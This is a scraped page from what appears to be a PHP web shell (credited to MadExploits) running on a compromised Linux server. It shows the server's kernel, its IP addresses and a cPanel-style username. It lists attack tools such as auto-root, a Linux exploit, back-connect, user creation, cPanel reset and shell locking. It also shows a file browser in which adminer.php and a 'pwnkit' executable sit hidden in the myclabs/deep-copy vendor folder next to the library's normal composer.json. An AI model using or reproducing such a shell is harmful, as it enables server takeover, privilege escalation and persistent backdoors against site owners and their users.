Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.213
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
vendor /
myclabs /
deep-copy /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
fixtures
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.gitattributes
136
B
-rw-r--r--
.gitignore
40
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.travis.yml
762
B
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
9.45
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
composer.json
784
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "myclabs/deep-copy", "type": "library", "description": "Create deep copies (clones) of your objects", "keywords": ["clone", "copy", "duplicate", "object", "object graph"], "license": "MIT", "autoload": { "psr-4": { "DeepCopy\\": "src/DeepCopy/" }, "files": [ "src/DeepCopy/deep_copy.php" ] }, "autoload-dev": { "psr-4": { "DeepCopy\\": "fixtures/", "DeepCopyTest\\": "tests/DeepCopyTest/" } }, "require": { "php": "^5.6 || ^7.0" }, "require-dev": { "doctrine/collections": "^1.0", "doctrine/common": "^2.6", "phpunit/phpunit": "^4.1" }, "config": { "sort-packages": true } }
Close